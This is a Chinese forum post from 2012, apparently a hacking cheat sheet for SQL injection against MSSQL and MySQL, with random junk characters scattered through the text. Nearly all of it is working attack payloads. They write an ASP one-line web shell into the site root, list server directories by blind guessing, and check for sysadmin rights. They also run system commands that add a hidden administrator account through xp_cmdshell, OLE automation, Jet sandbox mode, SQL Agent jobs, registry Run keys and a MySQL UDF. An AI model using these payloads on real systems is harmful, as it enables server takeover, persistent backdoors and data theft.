标题: mssql实用命令及导出一句话 [打印本页] 作者: admin 时间: 2012-9-13 17:49 标题: mssql实用命令及导出一句话 MSSQL语句导出一句话木马: S# z: g2 B! J$ }$ @. _) _6 i
首先确定网站的WEB路径0 e( S# K1 ^1 Z
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马 ( \4 P3 U! s9 I/ u+ t5 S 7 P2 P2 _" F- H1 K3 Q( Z" f;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 3 u- C/ M' k5 E/ c9 g3 N//将一句话木马插入表中 2 [: Q! u4 R& ]7 S5 ~ G- Z/ Y
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- ( r$ F4 D% Y. y! X$ z' Z//导出一个ASP文件 8 K. C' o [* {4 O; ^+ g0 q; t4 T& G# m4 Q. Q8 P
$ ^4 k/ x7 ? t. T1 L% U
关于MSSQL列目录 5 V9 X2 D0 g/ D u;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表 0 l6 `. b; \; L) i' Q0 _. A9 L9 tInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表 ; Y, D& S4 e8 T9 h4 D T8 `- v8 K+ b " \' R: J% n9 Mand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录 % [3 J9 X: y) V8 n/ Z% q 9 b3 F8 T- n) MAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段 ; R6 ?! l0 q1 Q' ]! o! @1 F ! ~' r% Y4 w9 l% O9 L3 _ rAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符 2 r/ K4 r* c" X) \8 Z# w 1 R& s0 [0 F$ t; G! y3 ? 7 u+ E8 A3 M5 J5 \8 j6 k) N9 c数据库版本和权限查看 ( E) I8 e5 H. t& Q- c5 ]and 1=(select @@VERSION) //查看详细的数据库信息. , Y: l0 b' `. c3 s3 I, x) l- Rand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA : X" P& v+ x& `$ A+ z0 wand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER 8 {/ Z% |* E% H! y: [ |5 B2 W# T/ }# K( t + `- {/ Q) \" N' T) ?1.利用xp_cmdshell执行命令 - q* O' ~& C3 G# x& ]exec master..xp_cmdshell 'net user rfire 123456 /add' ! n# ]+ d& l% wexec master..xp_cmdshell 'net localgroup administrators rfire /add' % V( X5 b1 p& p1 \. v& M& M: X 2 @$ u) I' [9 k$ \恢复xp_cmdshell存储过程 " ^0 ~0 E6 z/ oExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 0 ]: C4 ~1 E" G, D- v% G* F ) }9 c# R! j& }5 `0 R$ I* | 8 A* ]& g: v2 F' F5 C4 d* ?2.利用SP_OAcreate和SP_OAMETHOD执行命令; c o+ B7 P; D) ]8 d
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下, T3 @& O, @6 l2 B) ?
DECLARE @shell INT //建立一个@shell实体 5 i$ t+ C# r" n' o0 ^" r. sEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例0 J9 w+ ]0 c, _2 k
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例 2 Y1 z$ B; S, F0 U$ U( N/ G 5 l+ ~7 l" z1 ^. m3 k, }" L# ?2 T
3.利用沙盒模式) U1 e; S; \0 I1 `, k' \
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。1 m6 L4 o/ Y5 f2 }0 S
开启沙盒模式: 2 L& ?9 T* m2 y% LEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0 ( `9 h: `8 O: v8 E. x+ W. Y7 ^& R3 {4 G& F6 }/ x$ s; b
执行命令: $ B% t( M) l$ N+ xSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")'); $ I) } G/ B% T p# P# X2 f p5 \5 }5 |/ K( B
0 ]& U; g2 p4 s5 f- D- K
4.利用SQL代理执行命令5 {1 J8 B4 A8 H) F
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务 h# m- }% V% w) @. C: e
4 b* `/ L i: c9 z
执行命令: & c( Y9 q( T7 n/ n) q) A7 ^) Uuse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错' d8 s$ a4 q$ D7 o5 x" n" ]
exec sp_add_job 'x' / e; K3 I0 @& d, ]# |2 |* Uexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业 $ {5 o" B# c, h( P; f* p" \+ jexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业" ~5 [1 B$ M# v y3 I( M& h8 Y
2 }+ o7 |9 W) w9 G( }
& x6 O1 H6 n5 W( ]% `5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项) # N3 M) E7 r( S! s2 Z% Q' {EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'6 D1 r8 o3 I! P: k: L4 J) c# s
: M, q, a0 f9 ]) e: r, c& K* P # X2 r i& R/ m' C6.MYSQL的命令执行* h8 `0 ~0 G4 e# q" \: U/ Y
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)( }7 o1 E5 D8 e# ^ q, w Y3 _4 A
首先要在su.php下导出c:\windows\udf.dll 7 y) ?6 N- B. @; L导出后执行创建自定义函数命令: 2 U. V% B- X5 G! ?$ V9 XCreate Function cmdshell returns string soname 'udf.dll'4 m; H6 i o! L8 j! Y+ W" V- x
执行命令) ?* t {( T. G1 n4 g
select cmdshell('net user rfire 123456 /add') & L! q4 x# [" w7 K* ^执行后删除函数 drop function cmdshell8 o w# k ^* u% c' ?% y5 W